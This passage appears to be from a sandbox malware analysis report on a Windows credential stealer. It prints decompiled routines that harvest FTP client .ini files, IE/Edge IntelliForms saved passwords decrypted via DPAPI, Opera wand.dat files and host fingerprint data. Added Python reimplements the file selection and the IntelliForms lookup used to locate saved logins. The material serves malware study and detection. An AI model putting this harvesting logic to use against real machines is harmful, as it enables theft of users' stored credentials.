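def is_ini_candidate(full_path: str, sites_only: bool) -> bool:
    """StrStrIA(cFileName, ".ini") on the name, then, if the flag (_a12) is set,
    StrStrIA(full_path, "Sites\\") on the assembled path. Both are
    case-insensitive substring tests, so "x.INI.bak" qualifies."""
    name = full_path.rsplit("\\", 1)[-1]
    if ".ini" not in name.lower():
        return False
    return (not sites_only) or ("sites\\" in full_path.lower())


def walk(tree: dict, root: str, sites_only: bool) -> list:
    """Depth-first, unbounded recursion as in the decompile. Returns the paths
    that would be handed to E10004A6D (the per-file parser)."""
    selected = []
    for name, attrs in tree.get(root, []):
        full = root + "\\" + name            # E10001E05(E10001DB1(_a8, "\\"), cFileName)
        if attrs & FILE_ATTRIBUTE_DIRECTORY:
            if name.lower() in (".", ".."):  # the two lstrcmpiA exclusions
                continue
            selected.extend(walk(tree, full, sites_only))
        elif is_ini_candidate(full, sites_only):
            selected.append(full)
    return selected


if __name__ == "__main__":
    root = r"C:\Users\victim\AppData\Roaming\FtpClient"
    for path in walk(SAMPLE_TREE, root, sites_only=True):
        print(path)
```

Two practical consequences follow from the predicate: a decoy file only needs ".ini" somewhere in its name and "Sites\" somewhere in its path to be read, and because the recursion has no depth limit and no reparse-point check, the routine will descend through every subdirectory it is pointed at.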
Listing addresses (gutter column of the C listing): 0x10004a84 onward
                                                                                                                                        0x10004b06
                                                                                                                                        0x10004b06
                                                                                                                                        0x10004b12
                                                                                                                                        0x10004b7c
                                                                                                                                        0x10004b94
                                                                                                                                        0x10004baa
                                                                                                                                        0x10004baf
                                                                                                                                        0x10004bb0
                                                                                                                                        0x10004bb5
                                                                                                                                        0x10004bc4
                                                                                                                                        0x10004bb7
                                                                                                                                        0x10004bbd
                                                                                                                                        0x10004bbd
                                                                                                                                        0x10004bc9
                                                                                                                                        0x10004bcc
                                                                                                                                        0x10004bd2
                                                                                                                                        0x10004bd2
                                                                                                                                        0x10004bd7
                                                                                                                                        0x10004bd7
                                                                                                                                        0x10004b14
                                                                                                                                        0x10004b24
                                                                                                                                        0x10004b41
                                                                                                                                        0x10004b6d
                                                                                                                                        0x10004b72
                                                                                                                                        0x10004b72
                                                                                                                                        0x10004b41
                                                                                                                                        0x10004b24
                                                                                                                                        0x10004bee
                                                                                                                                        0x10004bfc
                                                                                                                                        0x10004bfc
                                                                                                                                        0x00000000
                                                                                                                                        0x10004b00

APIs
• FindFirstFileA.KERNEL32(00000000,?), ref: 10004AF4
• lstrcmpiA.KERNEL32(1000F8FD,?,00000000,?), ref: 10004B1D
• lstrcmpiA.KERNEL32(1000F8FF,?,1000F8FD,?,00000000,?), ref: 10004B3A
• FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 10004BE9
• FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 10004BFC
  • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
  • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
  • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
  • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
• String ID: *.*$.ini$Sites\$\*.*
• API String ID: 3040542784-999409347
• Opcode ID: 1728dadecd7df16186756211c261ddacedd66fc7505cbcf7c618c9f54e905af5
• Instruction ID: dfb24860b23a16f760b9f85428c702041dd6fa9fe267a47ac1474cd16b53a2d5
• Opcode Fuzzy Hash: 1728dadecd7df16186756211c261ddacedd66fc7505cbcf7c618c9f54e905af5
• Instruction Fuzzy Hash: 11315CB5900109AEFF51DF60CC42FED76A9EF043C0F0681A5FA08A5069EF75EE90AB55
Uniqueness

Uniqueness Score: 16.53%

Control-flow Graph

C-Code - Quality: 95%
E100044F3(void* __ecx, void* __eflags, intOrPtr _a4) {
	intOrPtr _v8;
	struct _OSVERSIONINFOA _v164;
	char* _v168;
	char _v172;
	intOrPtr _v176;
	struct _SYSTEM_INFO _v212;
	struct HINSTANCE__* _v216;
	void* __ebx;
	int _t51;
	void* _t61;
	intOrPtr _t65;
	intOrPtr* _t75;
	void* _t82;
	struct _SYSTEM_INFO* _t85;
	char* _t87;

	_v8 = E100015A9(_a4, 0, 0);
	E10001522(_a4, 0xbeef0001);
	E1000189F( &_v164, 0x9c);
	_v164.dwOSVersionInfoSize = 0x9c;
	_t51 = GetVersionExA( &_v164);
	_t85 = 0;
	_t86 = 0;
	_t87 =  &(_v164.szCSDVersion);
	while(_t85 < 0x80) {
		__eflags =  *_t87;
		if( *_t87 == 0) {
			_t86 = 1;
		}
		_t86 = _t86;
		__eflags = _t86;
		if(_t86 != 0) {
			 *_t87 = 0;
		}
		_t87 = _t87 + 1;
		_t85 =  &(_t85->dwOemId.dwOemId);
		__eflags = _t85;
	}
	if(_t51 == 0) {
		E10001558(_a4, 0, 0);
	} else {
		E10001558(_a4,  &_v164, 0x9c);
	}
	E10001522(_a4, E10002E8D());
	_v168 = E10001888(0x400);
	E10001558(_a4, _v168, GetLocaleInfoA(0x400, 0x1002, _v168, 0x3ff));
	E10001558(_a4, _v168, GetLocaleInfoA(0x400, 0x1001, _v168, 0x3ff)); // executed
	_t61 = E10002EF5(); // executed
	E10001522(_a4, _t61); // executed
	E10004462(_t85, _t86); // executed
	_t65 = E100027D0(_t85, _t86, "HWID",  &_v172); // executed
	_v176 = _t65;
	if(_v176 == 0 || _v172 < 0x14) {
		E10001558(_a4, 0, 0);
	} else {
		_v172 = _v172 + 4;
		E10001522(_a4, _v172);
		_v172 = _v172 - 4;
		E10001522(_a4, 0xffffffff);
		E10001537(_a4, _v176, _v172);
	}
	E10001871(_v176);
	E10001871(_v168);
	_t82 = 0;
	_v216 = GetModuleHandleA("kernel32.dll");
	if(_v216 != 0) {
		_t75 = GetProcAddress(_v216, "GetNativeSystemInfo");
		if(_t75 != 0) {
			_t86 =  &_v212;
			 *_t75( &_v212); // executed
			_t82 = 1;
		}
	}
	_t83 = _t82;
	_t96 = _t82;
	if(_t82 == 0) {
		GetSystemInfo( &_v212);
	}
	E10001558(_a4,  &_v212, 0x24);
	return E100015EF(_t83, _t85, _t86, _t96, _a4, _v8);
}

Addresses: 0x1000450a 0x10004515 0x10004526 0x1000452b 0x1000453c 0x10004541 0x10004543 0x10004545 0x10004560 0x1000454d 0x10004550 0x10004552 0x10004552 0x10004557 0x10004557 0x10004559 0x1000455b 0x1000455b 0x1000455e 0x1000455f 0x1000455f 0x1000455f 0x1000456a 0x10004589 0x1000456c 0x1000457b 0x1000457b 0x10004597 0x100045a6 0x100045d0 0x100045f9 0x100045fe 0x10004607 0x1000460c 0x1000461d 0x10004622 0x1000462f 0x1000467d 0x1000463a 0x1000463a 0x1000464a 0x1000464f 0x1000465b 0x1000466f 0x1000466f 0x10004688 0x10004693 0x10004698 0x100046a4 0x100046b1 0x100046c3 0x100046c5 0x100046c7 0x100046ce 0x100046d0 0x100046d0 0x100046c5 0x100046d1 0x100046d1 0x100046d3
                                                                                                                                        0x100046dc
                                                                                                                                        0x100046dc
                                                                                                                                        0x100046ed
                                                                                                                                        0x10004700

                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(0000009C), ref: 1000453C
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 100045C1
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 100045EA
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 1000469F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 100046BE
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 100046CE
                                                                                                                                        • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 100046DC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                                                                                                                                        • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                                                                                                                                        • API String ID: 1787888500-92997708
                                                                                                                                        • Opcode ID: 8ba9081ead8b85a4827e57aa99a48f6b601ebf9daf1fef26602265cb32dbbccf
                                                                                                                                        • Instruction ID: f3551a4575c16a329ef8b2f75a4e122ab3635f74703a56ba9832548d60b1d311
                                                                                                                                        • Opcode Fuzzy Hash: 8ba9081ead8b85a4827e57aa99a48f6b601ebf9daf1fef26602265cb32dbbccf
                                                                                                                                        • Instruction Fuzzy Hash: 1A514F79A00618FEFF11DB60CC06FDD7A76EF42381F4180A4B649790A9DB715F949B12
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

C-Code - Quality: 55%
			// Decompiler output (Joe Sandbox IDA plugin). The E-prefixed callees are unresolved
			// internal routines; the comments on their role are inferences from the surrounding
			// API calls, strings and argument layout, not recovered symbols.
			E10007E6C(void* __ecx, intOrPtr _a4, WCHAR* _a8, short* _a12) {   // _a8: target URL (wide string), _a4: collector context, _a12: out type marker
				char _v24;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v68;
				void* _v72;
				char _v76;
				void* _v80;
				char _v84;
				signed int _t52;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t84;
				signed int _t85;
				void* _t88;
				void* _t89;

				_t84 = __ecx;
				_t52 = lstrlenW(_a8);
				if(_t52 != 0) {
					// 20-byte digest of the UTF-16LE URL including its null terminator ((len << 1) + 2 bytes).
					// The algorithm is not recovered here; the 0x14-byte length is consistent with SHA-1, which is
					// what IE's IntelliForms Storage2 scheme uses for value names.
					E1000362D(_t84, _a8, (_t52 << 1) + 2,  &_v24);
					_t85 = 0;
					_v48 = 0;
					while(_t85 < 0x14) {                                   // checksum: byte-sum of the digest
						_v48 = _v48 + ( *(_t85 +  &_v24) & 0x000000ff);
						_t85 = _t85 + 1;
					}
					_t88 = 0;
					_v52 = 0;
					while(_t88 < 0x14) {                                   // hex-encode the digest, uppercase ("%02X")
						_push( *(_t88 +  &_v24) & 0x000000ff);
						wsprintfA( &_v44, "%02X");
						_t89 = _t89 + 0xc;
						_v52 = E10001E05(_v52,  &_v44);                  // appears to append to a heap-allocated string (inference)
						_t88 = _t88 + 1;
					}
					_v48 = _v48 & 0x000000ff;                              // append the checksum byte as two more hex digits
					_push(_v48);
					wsprintfA( &_v44, "%02X");
					_v52 = E10001E05(_v52,  &_v44);
					// Read the registry value named <40 hex digits><2-digit checksum> from the IE Storage2 key; on failure fall
					// back to the Edge IntelliForms FormData key. Value data -> _v60, length -> _v56 (inference).
					_t68 = E10001D2A( *0x1000f159, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _v52,  &_v56); // executed
					_t69 = _t68;
					if(_t69 == 0) {
						_t69 = E10001D2A( *0x1000f159, "SOFTWARE\\Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppContainer\\Storage\\microsoft.microsoftedge_8wekyb3d8bbwe\\MicrosoftEdge\\IntelliForms\\FormData", _v52,  &_v56); // executed
					}
					_t70 = _t69;
					if(_t70 != 0) {
						_v60 = _t70;
						if(_v56 != 0) {
							// Optional-entropy DATA_BLOB {_v84 = cbData, _v80 = pbData}: the URL itself, null included.
							_v84 = (lstrlenW(_a8) << 1) + 2;
							_push(_a8);
							_pop( *_t32);                                      // _t32: &_v80 (decompiler temporary, inferred from blob layout)
							// Input DATA_BLOB {_v68 = cbData, _v64 = pbData}: the registry value just read.
							_push(_v56);
							_pop( *_t34);                                      // _t34: &_v68
							_push(_v60);
							_pop( *_t36);                                      // _t36: &_v64
							_v72 = 0;
							if( *0x1000f4f4 != 0) {                            // resolved CryptUnprotectData pointer (APIs list, ref 10007F97)
								// Arguments pushed right-to-left: pDataIn=&_v68, ppszDataDescr=NULL, pOptionalEntropy=&_v84,
								// pvReserved=NULL, pPromptStruct=NULL, dwFlags=1 (CRYPTPROTECT_UI_FORBIDDEN), pDataOut=&_v76.
								_push( &_v76);
								_push(1);
								_push(0);
								_push(0);
								_push( &_v84);
								_push(0);
								_push( &_v68);
								if( *0x1000f4f4() != 0 && _v72 != 0) {         // output DATA_BLOB {_v76 = cbData, _v72 = pbData}
									if(_a12 != 0) {
										 *_a12 = 0x3f;                         // '?' marker written to the caller's type field
									}
									E10007B9C(0xbeef0003, _a8, _v72, _v76, _a4);  // hand the decrypted blob to the collector under tag 0xbeef0003
									LocalFree(_v72);                           // DPAPI output buffer
								}
							}
						}
						E10001871(_v60);                                       // free helper (inference)
					}
					return E10001871(_v52);
				} else {
					return _t52;
				}
			}
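The routine above is a worked instance of the IE/Edge IntelliForms lookup: the value name in Storage2 is derived from the URL, and the value data is DPAPI-protected with the URL as optional entropy. The following Python is an added example written for this page, not code from the sample or from Joe Sandbox. It reproduces the value-name derivation exactly as decompiled (20-byte digest of the UTF-16LE URL including its null terminator, uppercase hex, plus a one-byte checksum that is the byte-sum of the digest), and shows how an analyst or the stealer's own URL loop can match a dumped list of Storage2 value names against candidate URLs. SHA-1 is an assumption: the page shows only the 0x14-byte digest length, not the algorithm. The Storage2 dump is constructed inline, and the DPAPI decryption itself is Windows-only and is not performed here.

```python
import hashlib


def wide_with_null(url: str) -> bytes:
    """UTF-16LE encoding of `url` plus its terminator: (lstrlenW(url) << 1) + 2 bytes,
    the exact buffer the decompiled routine hashes and later reuses as DPAPI entropy."""
    return url.encode("utf-16-le") + b"\x00\x00"


def ie_storage2_value_name(url: str) -> str:
    """Registry value name under IntelliForms\\Storage2 for `url`.

    20-byte digest (assumed SHA-1; the page only shows the 0x14 length), each byte
    formatted "%02X", followed by "%02X" of the byte-sum of the digest masked to 8 bits,
    mirroring the two loops and the final wsprintfA in E10007E6C.
    """
    digest = hashlib.sha1(wide_with_null(url)).digest()
    assert len(digest) == 0x14
    checksum = sum(digest) & 0xFF
    return "".join("%02X" % b for b in digest) + "%02X" % checksum


def dpapi_entropy_blob(url: str) -> bytes:
    """pOptionalEntropy passed to CryptUnprotectData: the same wide URL with its null."""
    return wide_with_null(url)


def checksum_ok(value_name: str) -> bool:
    """True if the trailing two hex digits equal the byte-sum of the first 40 hex digits.
    Useful for filtering a Storage2 dump down to names that follow the IntelliForms scheme."""
    if len(value_name) != 42:
        return False
    try:
        digest = bytes.fromhex(value_name[:40])
        tail = int(value_name[40:], 16)
    except ValueError:
        return False
    return tail == (sum(digest) & 0xFF)


def match_saved_logins(candidate_urls, storage2_value_names):
    """Which of `candidate_urls` have an entry in the dumped Storage2 value names.
    This is the work the stealer's URL loop does one URL at a time."""
    names = {n.upper() for n in storage2_value_names if checksum_ok(n)}
    return [u for u in candidate_urls if ie_storage2_value_name(u) in names]


# Constructed sample: a Storage2 dump with one real-looking entry, one name with a bad
# checksum and one junk value, as an analyst might get from `reg query`.
SAMPLE_STORAGE2_NAMES = [
    ie_storage2_value_name("https://example.com/login"),
    "00" * 20 + "FF",          # checksum does not match the digest bytes
    "NotAnIntelliFormsName",
]

CANDIDATE_URLS = [
    "https://example.com/login",
    "https://mail.example.org/",
]

if __name__ == "__main__":
    for url in CANDIDATE_URLS:
        print(url, ie_storage2_value_name(url))
    print("saved logins:", match_saved_logins(CANDIDATE_URLS, SAMPLE_STORAGE2_NAMES))
```

Two practical points fall out of this. The entropy is the URL, so decrypting a Storage2 entry requires knowing the exact URL it was saved for, which is why the stealer carries a URL list rather than iterating the key blindly. And because the value name is deterministic, a defender can precompute the names for the organisation's own login pages and alert when an unexpected process reads them.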

Address column (per-statement addresses of the decompiled function above): 0x10007e6c - 0x10007fe5

APIs
• lstrlenW.KERNEL32(?), ref: 10007E76
• wsprintfA.USER32 ref: 10007EF3
• lstrlenW.KERNEL32(?,?), ref: 10007F54
• CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 10007F97
• LocalFree.KERNEL32(00000000), ref: 10007FCE
Strings
• Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 10007F11
• %02X, xrefs: 10007EBA, 10007EEA
• SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms\FormData, xrefs: 10007F2C
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
• String ID: %02X$SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms\FormData$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
• API String ID: 1926481713-2209629369
• Opcode ID: c847d7dbf156e13f3f4f6d95becba6d19491879096561c4f765ecfaba1d5b72a
• Instruction ID: 945d570ffd64688de8ac77bcfa3b85f80c13ad0b5f366b6f0017ba4c6604a26d
• Opcode Fuzzy Hash: c847d7dbf156e13f3f4f6d95becba6d19491879096561c4f765ecfaba1d5b72a
• Instruction Fuzzy Hash: 54416772C10119EBEF12DFA0DC41AEEBBBAFF08380F004025FA14A51A9E7759A51DB61
Uniqueness
Uniqueness Score: 100.00%

C-Code - Quality: 90%
E100068C0(void* __ebx, void* __ecx, intOrPtr _a4, char* _a8) {
	struct _WIN32_FIND_DATAA _v324;
	void* _v328;
	CHAR* _v332;
	char** _v336;
	char* _v340;
	char* _t30;
	void* _t36;
	int _t39;
	char* _t48;
	void* _t54;
	void* _t55;

	_t55 = __ecx;
	_t54 = __ebx;
	_v332 = 0;
	_t30 = _a8;
	if(_t30 == 0 ||  *_t30 == 0) {
		L14:
		return E10001871(_v332);
	} else {
		_v332 = E10001DB1(_a8, "\*.*");
		E1000189F( &_v324, 0x13e);
		_t36 = FindFirstFileA(_v332,  &_v324); // executed
		_v328 = _t36;
		if(_t36 + 1 == 0) {
			goto L14;
		} else {
			goto L4;
		}
		do {
			L4:
			if((_v324.dwFileAttributes & 0x00000010) != 0) {
				if(lstrcmpiA(0x1000f8fd,  &( &_v324->cFileName)) != 0) {
					if(lstrcmpiA(0x1000f8ff,  &( &_v324->cFileName)) != 0) {
						_v336 =  &( &_v324->cFileName);
						_t48 = E10001E05(E10001DB1(_a8, "\\"), _v336);
						_v340 = _t48;
						_push(_t48);
						if(StrStrIA(_v340, "opera") != 0) {
							E1000673C(_t54, _t55, _a4, _v340, "wand.dat");
						}
						E10001871();
					}
				}
			}
			_t39 = FindNextFileA(_v328,  &_v324); // executed
		} while (_t39 != 0);
		FindClose(_v328); // executed
		goto L14;
	}
}


APIs
• FindFirstFileA.KERNEL32(00000000,?), ref: 10006915
• lstrcmpiA.KERNEL32(1000F8FD,?,00000000,?), ref: 10006948
• lstrcmpiA.KERNEL32(1000F8FF,?,1000F8FD,?,00000000,?), ref: 10006962
• StrStrIA.SHLWAPI(?,opera,00000000,1000F8FF,?,1000F8FD,?,00000000,?), ref: 100069A7
• FindNextFileA.KERNEL32(?,?,00000000,?), ref: 100069D5
• FindClose.KERNEL32(?,?,?,00000000,?), ref: 100069E8
Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: Find$Filelstrcmpi$CloseFirstNext
• String ID: \*.*$opera$wand.dat
• API String ID: 3663067366-3278183560
• Opcode ID: f74ca87c9a1164d96b6df22719122c89a6263937ec1a51ae05beae7e1c30ea6f
• Instruction ID: 687ec9b7e5b116488062f103f307b43f01d51fa91902aef376313c28fcf12ca9
• Opcode Fuzzy Hash: f74ca87c9a1164d96b6df22719122c89a6263937ec1a51ae05beae7e1c30ea6f
• Instruction Fuzzy Hash: 34311E75900519AAFF62DF60CC42BED77BAEF083C0F148191F60CA9569EB31AE949F50
Uniqueness
Uniqueness Score: 0.06%

C-Code - Quality: 88%
                                                                                                                                        			E1000419E(void* __ecx, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                                                                                        				void* _v328;
                                                                                                                                        				CHAR* _v332;
                                                                                                                                        				char* _v336;
                                                                                                                                        				char* _t44;
                                                                                                                                        				CHAR* _t48;
                                                                                                                                        				void* _t52;
                                                                                                                                        				int _t58;
                                                                                                                                        				void* _t67;
                                                                                                                                        				void* _t73;
                                                                                                                                        				void* _t77;
                                                                                                                                        				signed int* _t78;
                                                                                                                                        
                                                                                                                                        				_t77 = __ecx;
                                                                                                                                        				_v332 = 0;
                                                                                                                                        				_t44 = _a8;
                                                                                                                                        				if(_t44 == 0 ||  *_t44 == 0) {
                                                                                                                                        					L25:
                                                                                                                                        					return E10001871(_v332);
                                                                                                                                        				} else {
                                                                                                                                        					if(E10002582(_a8) != 0) {
                                                                                                                                        						_t48 = E10001DB1(_a8, "*.*");
                                                                                                                                        					} else {
                                                                                                                                        						_t48 = E10001DB1(_a8, "\*.*");
                                                                                                                                        					}
                                                                                                                                        					_v332 = _t48;
                                                                                                                                        					E1000189F( &_v324, 0x13e);
                                                                                                                                        					_t52 = FindFirstFileA(_v332,  &_v324); // executed
                                                                                                                                        					_v328 = _t52;
                                                                                                                                        					if(_t52 + 1 != 0) {
                                                                                                                                        						do {
                                                                                                                                        							_t78 =  &_v324;
                                                                                                                                        							if(( *_t78 & 0x00000010) == 0) {
                                                                                                                                        								_v336 =  &(_t78[0xb]);
                                                                                                                                        								if(_a12 != 0) {
                                                                                                                                        									if(StrStrIA(_v336, _a12) == 0) {
                                                                                                                                        										goto L23;
                                                                                                                                        									}
                                                                                                                                        									L19:
                                                                                                                                        									_t73 = E10001E05(E10001DB1(_a8, "\\"), _v336);
                                                                                                                                        									_push(_t73);
                                                                                                                                        									if(_a20 == 0) {
                                                                                                                                        										E10004064(_a4, _t73, _a16);
                                                                                                                                        									} else {
                                                                                                                                        										_a20(_a4, _t73, _a16);
                                                                                                                                        									}
                                                                                                                                        									E10001871();
                                                                                                                                        									goto L23;
                                                                                                                                        								}
                                                                                                                                        								goto L19;
                                                                                                                                        							}
                                                                                                                                        							if(lstrcmpiA(0x1000f8fd,  &(_t78[0xb])) != 0) {
                                                                                                                                        								if(lstrcmpiA(0x1000f8ff,  &( &_v324->cFileName)) != 0) {
                                                                                                                                        									if(E10002582(_a8) != 0) {
                                                                                                                                        										_t67 = E10001DB1(_a8, 0);
                                                                                                                                        									} else {
                                                                                                                                        										_t67 = E10001DB1(_a8, "\\");
                                                                                                                                        									}
                                                                                                                                        									E1000419E(_t77, _a4, E10001E05(_t67,  &( &_v324->cFileName)), _a12, _a16, _a20); // executed
                                                                                                                                        									E10001871(_t68);
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        							L23:
                                                                                                                                        							_t58 = FindNextFileA(_v328,  &_v324); // executed
                                                                                                                                        						} while (_t58 != 0);
                                                                                                                                        						FindClose(_v328); // executed
                                                                                                                                        					}
                                                                                                                                        					goto L25;
                                                                                                                                        				}
}

Statement addresses for the listing above, in line order (the decompiler's line-to-address map; 0x00000000 marks lines with no address): 0x1000419e, 0x100041a7, 0x100041b4, 0x100041b6, 0x1000433a, 0x10004346, 0x100041c2, 0x100041cc, 0x100041e5, 0x100041ce, 0x100041d6, 0x100041d6, 0x100041ea, 0x100041fc, 0x1000420e, 0x10004213, 0x1000421a, 0x10004220, 0x10004220, 0x1000422c, 0x100042b8, 0x100042c2, 0x100042d6, 0x00000000, 0x00000000, 0x100042d8, 0x100042ec, 0x100042f1, 0x100042f6, 0x1000430b, 0x100042f8, 0x100042ff, 0x100042ff, 0x10004310, 0x00000000, 0x10004310, 0x00000000, 0x100042c4, 0x10004242, 0x1000425f, 0x10004270, 0x10004286, 0x10004272, 0x1000427a, 0x1000427a, 0x100042a9, 0x100042ae, 0x100042ae, 0x1000425f, 0x10004315, 0x10004322, 0x10004327, 0x10004335, 0x10004335, 0x00000000, 0x1000421a

                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 1000420E
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FD,?,00000000,?), ref: 1000423B
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FF,?,1000F8FD,?,00000000,?), ref: 10004258
                                                                                                                                        • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 10004322
                                                                                                                                        • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 10004335
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                          • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                          • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                                                                                        • String ID: *.*$\*.*
                                                                                                                                        • API String ID: 3040542784-1692270452
                                                                                                                                        • Opcode ID: 95df30f0a96735e48b4b14098533dc866f4e50dbac32fbb44b4015c2d9744c9c
                                                                                                                                        • Instruction ID: 8c46a5e388c265dbd94ec75caa8cec349609daf9b32e0d2eeafafdca37b19f99
                                                                                                                                        • Opcode Fuzzy Hash: 95df30f0a96735e48b4b14098533dc866f4e50dbac32fbb44b4015c2d9744c9c
                                                                                                                                        • Instruction Fuzzy Hash: 1D411CB550010ABAFF11DF60CC42BED7AA5EF143C0F128191FA18A5069DF31AAA0AB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 7.75%

                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                        			E02442F20(BYTE* _a4, int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                        				int _v8;
                                                                                                                                        				long* _v12;
                                                                                                                                        				long* _v16;
                                                                                                                                        				int _v20;
                                                                                                                                        				intOrPtr _v24;
                                                                                                                                        				int _t32;
                                                                                                                                        				intOrPtr _t33;
                                                                                                                                        				long* _t35;
                                                                                                                                        
                                                                                                                                        				_v16 = 0;
                                                                                                                                        				_v8 = 0;
                                                                                                                                        				_v12 = 0;
                                                                                                                                        				_v20 = 0;
                                                                                                                                        				_t32 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
                                                                                                                                        				if(_t32 != 0) {
                                                                                                                                        					__imp__CryptCreateHash(_v12, 0x8004, 0, 0,  &_v8); // executed
                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                        						_t33 = _a16;
                                                                                                                                        						__imp__CryptHashData(_v8, _a12, _t33, 0);
                                                                                                                                        						if(_t33 != 0) {
                                                                                                                                        							_v24 = 0x280011;
                                                                                                                                        							_t35 = _v12;
                                                                                                                                        							__imp__CryptDeriveKey(_t35, 0x6801, _v8, _v24,  &_v16); // executed
                                                                                                                                        							if(_t35 != 0) {
                                                                                                                                        								if(CryptDecrypt(_v16, 0, 1, 0, _a4,  &_a8) != 0) {
                                                                                                                                        									_v20 = _a8;
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                        					__imp__CryptDestroyHash(_v8);
                                                                                                                                        					_v8 = 0;
                                                                                                                                        				}
                                                                                                                                        				if(_v16 != 0) {
                                                                                                                                        					CryptDestroyKey(_v16);
                                                                                                                                        					_v16 = 0;
                                                                                                                                        				}
                                                                                                                                        				if(_v12 != 0) {
                                                                                                                                        					CryptReleaseContext(_v12, 0);
                                                                                                                                        					_v12 = 0;
                                                                                                                                        				}
                                                                                                                                        				return _v20;
}

